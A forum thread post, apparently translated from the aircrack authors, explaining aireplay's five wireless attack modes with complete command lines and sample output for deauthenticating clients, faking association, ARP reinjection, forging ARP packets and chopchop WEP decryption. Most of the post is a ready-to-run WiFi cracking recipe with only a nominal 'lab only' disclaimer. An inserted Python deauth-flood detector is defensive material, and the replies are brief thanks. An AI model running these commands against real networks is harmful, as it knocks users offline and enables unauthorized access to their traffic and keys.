!The key to cracking! aireplay in detail!!
<p>Most of this article is translated from the author of the aircrack pack. It was tested only in a lab environment; please do not use it for illegal attempts.</p>
<p>Anyone with some experience should know the role aireplay plays in cracking.</p>
<p>If you have been repeatedly frustrated in your experiments, the following should be useful to you.</p>
<p>aireplay has 5 attack modes, each for a different situation. Here they are one by one:</p>
<p>In the examples below, 00:13:10:30:24:9C is the MAC address of the AP (wireless router) (on channel 6), and 00:09:5B:EB:C5:2B is the client's MAC address.</p>
<p>+ Attack 0: deauthentication</p>
<p>This attack mode forcibly disconnects the client from the router so that it reconnects. During this, the WPA handshake and valid WEP IVs can be captured, and a working ARP attack can be produced (together with the -3 attack). This is very effective in practice. If a client is connected to the router but nobody is using the network to generate useful data, then even -3 (see the details below) cannot produce a working ARP attack. If a -0 attack is run at the same time as -3, the -3 attack is activated immediately.</p>
<p>Obviously, this does not work without a client.</p>
<p>Some examples:</p>
<p>o WPA Handshake capture with an Atheros</p>
<p>airmon.sh start ath0<br/>airodump ath0 out 6 (switch to another console)<br/>aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0<br/>(wait for a few seconds)<br/>aircrack -w /path/to/dictionary out.cap</p>
<p>o ARP request generation with a Prism2 card</p>
<p>airmon.sh start wlan0<br/>airodump wlan0 out 6 (switch to another console)<br/>aireplay -0 5 -a 00:13:10:30:24:9C wlan0<br/>aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0</p>
<p>aireplay -0 5 ------ performs the attack five times; if the count is 0, it attacks in a loop and the client cannot get online normally, being disconnected again and again.</p>
<p>-a is followed by the router's MAC address. You may add -h followed by the MAC address of the client being attacked, or leave it out.</p>
<p>wlan0 is the name of your own wireless card. Check it with ifconfig -a; it may also be wifi0, ath1, and so on. Many posts have covered this, so no more on it here.</p>
<p>+ Attack 1: fake authentication</p>
<p>This attack is somewhat useful when no legitimate client is connected to the router: here we fake a client and make it connect to the router. This can be used together with -3 (ARP request reinjection) and -4 ("chopchop" WEP decryption). If there is a client, using -3 or -4 against that client is more effective.</p>
<p>In practice, if there is no client, this attack will very likely have no effect.</p>
<p>aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0<br/>12:14:06 Sending Authentication Request<br/>12:14:06 Authentication successful<br/>12:14:06 Sending Association Request<br/>12:14:07 Association successful :-)</p>
<p>With patched madwifi CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:</p>
<p>ifconfig ath0 down hw ether 00:10:20:30:40:50<br/>iwconfig ath0 mode Managed essid myap key AAAAAAAAAA<br/>ifconfig ath0 up</p>
<p>sysctl -w dev.ath0.rawdev=1<br/>ifconfig ath0raw up<br/>airodump ath0raw out 6</p>
<p>Then you can run attack 3 or 4 (aireplay will automatically replace ath0 with ath0raw below):</p>
<p>aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0<br/>aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0</p>
<p>Some access points require reassociation every 30 seconds, otherwise our fake client is considered disconnected. In this case, set up the periodic re-association delay:</p>
<p>aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0</p>
<p>+ Attack 2: interactive packet replay</p>
<p>This attack mode is basically useless; it is only used for testing at times.</p>
<p>aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0</p>
<p>+ Attack 3: ARP-request reinjection</p>
<p>This attack mode is the most effective. Here you can either use a legitimate client, or use a fake client together with -1. Normally you need to wait a few minutes until a valid ARP request appears. If there is no traffic at all, this attack fails. In practice, if there is no ARP request between the legitimate client and the router for a long time, you can try running a -0 attack at the same time.</p>
<p>Please note that you can also reuse ARP requests from a previous capture using the -r switch.</p>
<p>aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0<br/>Saving ARP requests in replay_arp-0627-121526.cap<br/>You must also start airodump to capture replies.<br/>Read 2493 packets (got 1 ARP requests), sent 1305 packets...</p>
<p>+ Attack 4: KoreK's "chopchop" (CRC prediction)</p>
<p>This attack mode is not commonly used, but once it succeeds it can decrypt a WEP packet without knowing the key.</p>
<p>This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. This attack requires at least one WEP data packet.</p>
<p>1. First, we decrypt one packet:</p>
<p>aireplay -4 -h 00:09:5B:EB:C5:2B ath0</p>
<p>2. Let's have a look at the IP address:</p>
<p>tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap<br/>reading from file replay_dec-0627-022301.cap, link-type [...]<br/>IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1</p>
<p>3. Then, forge an ARP request.</p>
<p>The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.</p>
<p>./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \<br/>00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap</p>
<p>4. And replay our forged ARP request:</p>
<p>aireplay -2 -r arp.cap ath0</p>
<p>————————————————————————<br/><font color="#ff0000">Removed the reply-to-view restriction and marked this post as featured. Tange/2008.6.4</font></p>
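The -0 attack described above is also what a wireless IDS watches for: a burst of deauthentication frames spoofed from the AP's BSSID. As an added example (not from the post or from the aircrack tools), the following parses the 802.11 management header, which is where aireplay's frames are visible on the air, and raises an alert when deauth/disassoc frames for one BSSID exceed a threshold inside a sliding one-second window. The frames it feeds itself are constructed in code, reusing the AP and client addresses from the examples above; the threshold of 20 is an assumed tuning value.

```python
import struct
from collections import defaultdict, deque
# Addresses reused from the examples in the post above (sample values, not a capture).
AP_BSSID, CLIENT = "00:13:10:30:24:9c", "00:09:5b:eb:c5:2b"
DEAUTH, DISASSOC = 12, 10  # 802.11 management subtypes (frame type 0)

def parse_mgmt(frame):
    """Decode an 802.11 MAC header; return a dict for management frames, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:  # type 0 = management
        return None
    mac = lambda off: ":".join(f"{x:02x}" for x in frame[off:off + 6])
    info = {"subtype": (fc >> 4) & 0xF, "da": mac(4), "sa": mac(10), "bssid": mac(16)}
    if info["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # reason code after header
    return info

class DeauthFloodDetector:
    """Sliding-window count of deauth/disassoc frames per BSSID (WIDS-style rule)."""
    def __init__(self, threshold=20, window_s=1.0):  # threshold is an assumed tuning value
        self.threshold, self.window_s = threshold, window_s
        self.seen = defaultdict(deque)  # bssid -> timestamps inside the window

    def observe(self, ts, frame):
        """Feed one frame; return an alert when the count first reaches the threshold."""
        info = parse_mgmt(frame)
        if not info or info["subtype"] not in (DEAUTH, DISASSOC):
            return None
        q = self.seen[info["bssid"]]
        q.append(ts)
        while ts - q[0] > self.window_s:
            q.popleft()
        if len(q) == self.threshold:
            return {"bssid": info["bssid"], "count": len(q), "reason": info.get("reason")}
        return None

def _frame(subtype, da, sa, bssid, reason):
    """Constructed management frame (header + reason code), used only as sample input."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return (struct.pack("<HH", subtype << 4, 0) + mac(da) + mac(sa) + mac(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

def run_sample():
    """Constructed timeline: one normal deauth, then a burst like the -0 attack above."""
    det = DeauthFloodDetector()
    frames = [(0.0, _frame(DEAUTH, AP_BSSID, CLIENT, AP_BSSID, 3))]  # station leaving
    frames += [(5.0 + i * 0.0015, _frame(DEAUTH, CLIENT, AP_BSSID, AP_BSSID, 7))
               for i in range(64)]  # 64 spoofed deauths "from the AP" in under 0.1 s
    return [a for a in (det.observe(ts, f) for ts, f in frames) if a]
```

On a real monitor-mode capture the same `observe` call would be fed each frame's timestamp and raw 802.11 bytes (radiotap header removed); a single deauth with reason 3 stays below the threshold, the burst trips it once.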
<p>[This post was edited by tange on 2008-6-4 23:22:40]</p>
<p>:) I cracked my own WEP, and cracked it without really understanding how~~ :)</p>
<p>Let me take a look and learn first!</p>
<p>Need to learn! I want to see</p>
<p>This is good~! Hahaha~~! Useful</p>
<p>Thanks, taking a look to learn</p>
<p>Learning</p>
<p>Must study this properly!!!</p>
<p>Thanks, learning</p>
<p>Must learn this!!</p>
<p>Newbie learning, respects to all the experts!</p>
<p>Heh, popularity is certainly important!</p>